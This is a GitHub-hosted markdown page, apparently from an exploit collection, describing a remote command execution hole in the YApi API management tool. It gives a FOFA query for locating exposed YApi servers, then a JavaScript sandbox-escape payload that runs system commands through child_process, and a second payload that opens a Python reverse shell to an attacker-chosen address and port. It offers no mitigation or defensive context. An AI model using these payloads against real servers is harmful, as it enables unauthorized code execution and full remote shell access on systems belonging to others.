Skip to content

Latest commit

 

History

History
54 lines (37 loc) · 1.82 KB

Yapi存在远程命令执行漏洞.md

File metadata and controls

54 lines (37 loc) · 1.82 KB

Yapi存在远程命令执行漏洞

Yapi存在远程命令执行漏洞

fofa

app="YApi"

poc

注册账号登录

新建项目

添加接口

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

反弹shell

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
Poc = process.mainModule.require("child_process").spawnSync(
  'python', ['-c', 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",6699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
)